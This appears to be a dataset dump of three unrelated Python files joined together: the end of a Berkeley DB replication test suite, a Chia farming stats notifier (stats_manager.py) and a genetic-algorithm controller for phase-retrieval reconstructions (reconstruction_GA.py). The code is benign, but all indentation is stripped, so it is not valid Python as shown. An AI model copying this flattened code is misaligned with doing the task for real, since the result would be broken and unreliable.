txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
if db.version() >= (4,7) :
def test04_test_clockskew(self) :
fast, slow = 1234, 1230
self.dbenvMaster.rep_set_clockskew(fast, slow)
self.assertEqual((fast, slow),
self.dbenvMaster.rep_get_clockskew())
self.basic_rep_threading()
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
stats_manager.py | # std
import logging
import re
from datetime import datetime, timedelta
from typing import cast, List, Union
from threading import Thread
from time import sleep
# project
from . import (
HarvesterActivityConsumer,
PartialConsumer,
BlockConsumer,
WalletAddedCoinConsumer,
FinishedSignageConsumer,
)
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.wallet_added_coin_stats import WalletAddedCoinStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from .stat_accumulators.found_partial_stats import FoundPartialStats
from .stat_accumulators.found_block_stats import FoundBlockStats
from src.chia_log.parsers.wallet_added_coin_parser import WalletAddedCoinMessage
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.chia_log.parsers.partial_parser import PartialMessage
from src.chia_log.parsers.block_parser import BlockMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
self._enable = config.get("enable", False)
self._notify_time = self._parse_notify_time(config.get("time_of_day", "21:00"))
self._frequency_hours = config.get("frequency_hours", 24)
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
WalletAddedCoinStats(),
FoundProofStats(),
FoundPartialStats(),
FoundBlockStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(
f"Summary notifications will be sent out every {self._frequency_hours} "
f"hours starting from {self._notify_time['hour']:02d}:{self._notify_time['minute']:02d}"
)
self._datetime_next_summary = datetime.now().replace(
hour=self._notify_time["hour"], minute=self._notify_time["minute"], second=0, microsecond=0
)
while datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_wallet_messages(self, objects: List[WalletAddedCoinMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, WalletAddedCoinConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_partial_messages(self, objects: List[PartialMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, PartialConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_block_messages(self, objects: List[BlockMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, BlockConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
summary = f"Howdy farmer! :farmer:\nHow's the farm? :seedling:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
sleep(1)
def stop(self):
self._is_running = False
def _parse_notify_time(self, value: Union[str, int], default: dict = {"hour": 21, "minute": 0}) -> dict:
if type(value) == int:
return {"hour": value, "minute": 0}
value = cast(str, value)
match = re.match(r"(?:[01]\d|2[0-3]):(?:[0-5]\d)", value)
if match:
return {"hour": int(value[:2]), "minute": int(value[-2:])}
return default
|
reconstruction_GA.py | # #########################################################################
# Copyright (c) , UChicago Argonne, LLC. All rights reserved. #
# #
# See LICENSE file. #
# #########################################################################
"""
This module controls the genetic algoritm process.
"""
import numpy as np
import os
import cohere.controller.reconstruction_multi as multi
import cohere.utilities.utils as ut
from multiprocessing import Process, Queue
import shutil
import importlib
import cohere.controller.phasing as calc
__author__ = "Barbara Frosik"
__copyright__ = "Copyright (c) 2016, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = ['reconstruction']
def set_lib(pkg, ndim=None):
global dvclib
if pkg == 'af':
if ndim == 1:
dvclib = importlib.import_module('cohere.lib.aflib').aflib1
elif ndim == 2:
dvclib = importlib.import_module('cohere.lib.aflib').aflib2
elif ndim == 3:
dvclib = importlib.import_module('cohere.lib.aflib').aflib3
else:
raise NotImplementedError
elif pkg == 'cp':
dvclib = importlib.import_module('cohere.lib.cplib').cplib
elif pkg == 'np':
dvclib = importlib.import_module('cohere.lib.nplib').nplib
calc.set_lib(dvclib, pkg=='af')
def set_ga_defaults(pars):
if 'reconstructions' not in pars:
pars['reconstructions'] = 1
if 'ga_generations' not in pars:
pars['ga_generations'] = 1
# check if pc feature is on
if 'pc' in pars['algorithm_sequence'] and 'pc_interval' in pars:
if not 'ga_gen_pc_start' in pars:
pars['ga_gen_pc_start'] = 0
pars['ga_gen_pc_start'] = min(pars['ga_gen_pc_start'], pars['ga_generations']-1)
if 'ga_fast' not in pars:
pars['ga_fast'] = False
if 'ga_metrics' not in pars:
pars['ga_metrics'] = ['chi'] * pars['ga_generations']
else:
metrics = pars['ga_metrics']
if len(metrics) == 1:
metrics = metrics * pars['ga_generations']
elif len(metrics) < pars['ga_generations']:
metrics = metrics + ['chi'] * (pars['ga_generations'] - len(metrics))
pars['ga_metrics'] = metrics
ga_reconstructions = []
if 'ga_cullings' in pars:
worst_remove_no = pars['ga_cullings']
if len(worst_remove_no) < pars['ga_generations']:
worst_remove_no = worst_remove_no + [0] * (pars['ga_generations'] - len(worst_remove_no))
else:
worst_remove_no = [0] * pars['ga_generations']
pars['worst_remove_no'] = worst_remove_no
# calculate how many reconstructions should continue
reconstructions = pars['reconstructions']
for culling in worst_remove_no:
reconstructions = reconstructions - culling
if reconstructions <= 0:
return 'culled down to 0 reconstructions, check configuration'
ga_reconstructions.append(reconstructions)
pars['ga_reconstructions'] = ga_reconstructions
if 'shrink_wrap_threshold' in pars:
shrink_wrap_threshold = pars['shrink_wrap_threshold']
else:
shrink_wrap_threshold = .1
if 'ga_shrink_wrap_thresholds' in pars:
ga_shrink_wrap_thresholds = pars['ga_shrink_wrap_thresholds']
if len(ga_shrink_wrap_thresholds) == 1:
ga_shrink_wrap_thresholds = ga_shrink_wrap_thresholds * pars['ga_generations']
elif len(ga_shrink_wrap_thresholds) < pars['ga_generations']:
ga_shrink_wrap_thresholds = ga_shrink_wrap_thresholds + [shrink_wrap_threshold] * (pars['ga_generations'] - len(ga_shrink_wrap_thresholds))
else:
ga_shrink_wrap_thresholds = [shrink_wrap_threshold] * pars['ga_generations']
pars['ga_shrink_wrap_thresholds'] = ga_shrink_wrap_thresholds
if 'shrink_wrap_gauss_sigma' in pars:
shrink_wrap_gauss_sigma = pars['shrink_wrap_gauss_sigma']
else:
shrink_wrap_gauss_sigma = .1
if 'ga_shrink_wrap_gauss_sigmas' in pars:
ga_shrink_wrap_gauss_sigmas = pars['ga_shrink_wrap_gauss_sigmas']
if len(ga_shrink_wrap_gauss_sigmas) == 1:
ga_shrink_wrap_gauss_sigmas = ga_shrink_wrap_gauss_sigmas * pars['ga_generations']
elif len(pars['ga_shrink_wrap_gauss_sigmas']) < pars['ga_generations']:
ga_shrink_wrap_gauss_sigmas = ga_shrink_wrap_gauss_sigmas + [shrink_wrap_gauss_sigma] * (pars['ga_generations'] - len(ga_shrink_wrap_gauss_sigmas))
else:
ga_shrink_wrap_gauss_sigmas = [shrink_wrap_gauss_sigma] * pars['ga_generations']
pars['ga_shrink_wrap_gauss_sigmas'] = ga_shrink_wrap_gauss_sigmas
if 'ga_breed_modes' not in pars:
pars['ga_breed_modes'] = ['sqrt_ab'] * pars['ga_generations']
else:
ga_breed_modes = pars['ga_breed_modes']
if len(ga_breed_modes) == 1:
ga_breed_modes = ga_breed_modes * pars['ga_generations']
elif len(ga_breed_modes) < pars['ga_generations']:
ga_breed_modes = ga_breed_modes + ['sqrt_ab'] * (pars['ga_generations'] - len(ga_breed_modes))
pars['ga_breed_modes'] = ga_breed_modes
if 'ga_lowpass_filter_sigmas' in pars:
pars['low_resolution_generations'] = len(pars['ga_lowpass_filter_sigmas'])
else:
pars['low_resolution_generations'] = 0
if pars['low_resolution_generations'] > 0:
if 'low_resolution_alg' not in pars:
pars['low_resolution_alg'] = 'GAUSS'
return pars
def order_dirs(tmp, dirs, evals, prev_dir_seq, metric):
"""
Orders results in generation directory in subdirectories numbered from 0 and up, the best result stored in the '0' subdirectory. The ranking is done by numbers in evals list, which are the results of the generation's metric to the image array.
Parameters
----------
dirs : list
list of directories where the reconstruction results files are saved
evals : list
list of evaluation of the results in the directories from the dirs list. The evaluation is a number calculated for metric configured for this generation
Returns
-------
ordered_prev_dirs : list
a list of previous directories ordered from best to worst
"""
# ranks keeps indexes of reconstructions from best to worst
# for most of the metric types the minimum of the metric is best, but for
# 'summed_phase' and 'area' it is oposite, so reversing the order
ranks = np.argsort(evals).tolist()
if metric == 'summed_phase' or metric == 'area':
ranks.reverse()
for i in ranks:
tmp[ranks[i]].append((i, evals[ranks[i]]))
# all the generation directories are in the same parent directory
parent_dir = os.path.abspath(os.path.join(dirs[0], os.pardir))
rank_dirs = []
# append "_<rank>" to each result directory name
for i in range(len(ranks)):
dest = os.path.join(parent_dir, str(i) + '_' + str(ranks[i]))
shutil.move(dirs[i], dest)
rank_dirs.append(dest)
# remove the number preceding rank from each directory name, so the directories are numbered
# according to rank
for dir in rank_dirs:
last_sub = os.path.basename(dir)
dest = os.path.join(parent_dir, last_sub.split('_')[-1])
shutil.move(dir, dest)
return tmp
def order_processes(proc_metrics, metric_type):
"""
Orders results in generation directory in subdirectories numbered from 0 and up, the best result stored in the '0' subdirectory. The ranking is done by numbers in evals list, which are the results of the generation's metric to the image array.
Parameters
----------
dirs : list
list of directories where the reconstruction results files are saved
evals : list
list of evaluation of the results in the directories from the dirs list. The evaluation is a number calculated for metric configured for this generation
Returns
-------
nothing
"""
ranked_proc = sorted(proc_metrics.items(), key=lambda x: x[1], reverse=False)
# ranks keeps indexes of reconstructions from best to worst
# for most of the metric types the minimum of the metric is best, but for
# 'summed_phase' and 'area' it is oposite, so reversing the order
if metric_type == 'summed_phase' or metric_type == 'area':
ranked_proc.reverse()
return ranked_proc
def cull(lst, no_left):
if len(lst) <= no_left:
return lst
else:
return lst[0:no_left]
def reconstruction(lib, conf_file, datafile, dir, devices):
"""
This function controls reconstruction utilizing genetic algorithm.
Parameters
----------
lib : str
library acronym to use for reconstruction. Supported:
np - to use numpy
cp - to use cupy
af - to use arrayfire
cpu, opencl, or cuda - to use specified library of arrayfire
conf_file : str
configuration file with reconstruction parameters
datafile : str
name of the file containing data
dir : str
a parent directory that holds the generations. It can be experiment directory or scan directory.
devices : list
list of GPUs available for this reconstructions
Returns
-------
nothing
"""
pars = ut.read_config(conf_file)
pars = set_ga_defaults(pars)
if 'save_dir' in pars:
save_dir = pars['save_dir']
else:
filename = conf_file.split('/')[-1]
save_dir = os.path.join(dir, filename.replace('config_rec', 'results_phasing'))
generations = pars['ga_generations']
if 'reconstructions' in pars:
reconstructions = pars['reconstructions']
else:
reconstructions = 1
if reconstructions < 2:
print ("GA not implemented for a single reconstruction")
return
# the cupy does not run correctly with multiprocessing, but limiting number of runs to available devices will work as temporary fix
if pars['ga_fast']: # the number of processes is the same as available GPUs (can be same GPU if can fit more recs)
if lib == 'af' or lib == 'cpu' or lib == 'opencl' or lib == 'cuda':
if datafile.endswith('tif') or datafile.endswith('tiff'):
try:
data = ut.read_tif(datafile)
except:
print('could not load data file', datafile)
return
elif datafile.endswith('npy'):
try:
data = np.load(datafile)
except:
print('could not load data file', datafile)
return
else:
print('no data file found')
return
set_lib('af', len(data.shape))
if lib != 'af':
dvclib.set_backend(lib)
else:
set_lib(lib)
reconstructions = min(reconstructions, len(devices))
workers = [calc.Rec(pars, datafile) for _ in range(reconstructions)]
processes = {}
for worker in workers:
worker_qin = Queue()
worker_qout = Queue()
process = Process(target=worker.fast_ga, args=(worker_qin, worker_qout))
process.start()
processes[process.pid] = [worker_qin, worker_qout]
prev_dirs = None
for g in range(generations):
print ('starting generation',g)
if g == 0:
for pid in processes:
worker_qin = processes[pid][0]
worker_qin.put(('init_dev', devices.pop()))
bad_processes = []
for pid in processes:
worker_qout = processes[pid][1]
ret = worker_qout.get()
if ret < 0:
worker_qin = processes[pid][0]
worker_qin.put('done')
bad_processes.append(pid)
# remove bad processes from dict (in the future we may reuse them)
for pid in bad_processes:
processes.pop(pid)
for pid in processes:
worker_qin = processes[pid][0]
if prev_dirs is None:
prev_dir = None
else:
prev_dir = prev_dirs[pid]
worker_qin.put(('init', prev_dir, g))
for pid in processes:
worker_qout = processes[pid][1]
ret = worker_qout.get()
if g > 0:
for pid in processes:
worker_qin = processes[pid][0]
worker_qin.put('breed')
for pid in processes:
worker_qout = processes[pid][1]
ret = worker_qout.get()
for pid in processes:
worker_qin = processes[pid][0]
worker_qin.put('iterate')
bad_processes = []
for pid in processes:
worker_qout = processes[pid][1]
ret = worker_qout.get()
if ret < 0:
worker_qin = processes[pid][0]
worker_qin.put('done')
bad_processes.append(pid)
# remove bad processes from dict (in the future we may reuse them)
for pid in bad_processes:
processes.pop(pid)
# get metric, i.e the goodness of reconstruction from each run
proc_metrics = {}
metric_type = pars['ga_metrics'][g]
for pid in processes:
worker_qin = processes[pid][0]
worker_qin.put(('get_metric', metric_type))
for pid in processes:
worker_qout = processes[pid][1]
metric = worker_qout.get()
proc_metrics[pid] = metric
# order processes by metric
proc_ranks = order_processes(proc_metrics, metric_type)
# cull
culled_proc_ranks = cull(proc_ranks, pars['ga_reconstructions'][g])
# remove culled processes from list (in the future we may reuse them)
for i in range(len(culled_proc_ranks), len(proc_ranks)):
pid = proc_ranks[i][0]
worker_qin = processes[pid][0]
worker_qin.put('done')
processes.pop(pid)
# save results, we may modify it later to save only some
gen_save_dir = os.path.join(save_dir, 'g_' + str(g))
prev_dirs = {}
for i in range(len(culled_proc_ranks)):
pid = culled_proc_ranks[i][0]
worker_qin = processes[pid][0]
worker_qin.put(('save_res', os.path.join(gen_save_dir, str(i))))
prev_dirs[pid] = os.path.join(gen_save_dir, str(i))
for pid in processes:
worker_qout = processes[pid][1]
ret = worker_qout.get()
if len(processes) == 0:
break
for pid in processes:
worker_qin = processes[pid][0]
worker_qin.put('done')
else: # not fast GA
tmp = []
rec = multi
prev_dirs = []
if 'init_guess' not in pars:
pars['init_guess'] = 'random'
if pars['init_guess'] == 'continue':
continue_dir = pars['continue_dir']
for sub in os.listdir(continue_dir):
image, support, coh = ut.read_results(os.path.join(continue_dir, sub) + '/')
if image is not None:
prev_dirs.append(os.path.join(continue_dir, sub))
tmp.append([os.path.join(continue_dir, sub)])
if len(prev_dirs) < reconstructions:
for i in range(reconstructions - len(prev_dirs)):
tmp.append(['random' + str(i)])
prev_dirs = prev_dirs + (reconstructions - len(prev_dirs)) * [None]
elif pars['init_guess'] == 'AI_guess':
import cohere.controller.AI_guess as ai
tmp.append(['AI_guess'])
for i in range(reconstructions - 1):
tmp.append(['random' + str(i)])
ai_dir = ai.start_AI(pars, datafile, dir)
if ai_dir is None:
return
prev_dirs = [ai_dir] + (reconstructions - 1) * [None]
else:
for i in range(reconstructions):
prev_dirs.append(None)
tmp.append(['random' + str(i)])
q = Queue()
for g in range(generations):
print ('starting generation',g)
gen_save_dir = os.path.join(save_dir, 'g_' + str(g))
metric_type = pars['ga_metrics'][g]
p = Process(target=rec.multi_rec, args=(lib, gen_save_dir, devices, reconstructions, pars, datafile, prev_dirs, metric_type, g, q))
p.start()
p.join()
temp_dirs, evals, prev_dir_seq = q.get()
#ranks_file.write(str(evals)+'\n'+str(prev_dir_seq))
# results are saved in a list of directories - save_dir
# it will be ranked, and moved to temporary ranked directories
tmp = order_dirs(tmp, temp_dirs, evals, prev_dir_seq, metric_type)
prev_dirs = temp_dirs
reconstructions = pars['ga_reconstructions'][g]
prev_dirs = cull(prev_dirs, reconstructions)
# the tmp hold the raning info. print it to a file
rank_file = open(os.path.join(save_dir, 'ranks.txt'), 'w+')
for l in tmp:
rank_file.write(str(l) + '\n')
rank_file.flush()
print('done gen')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.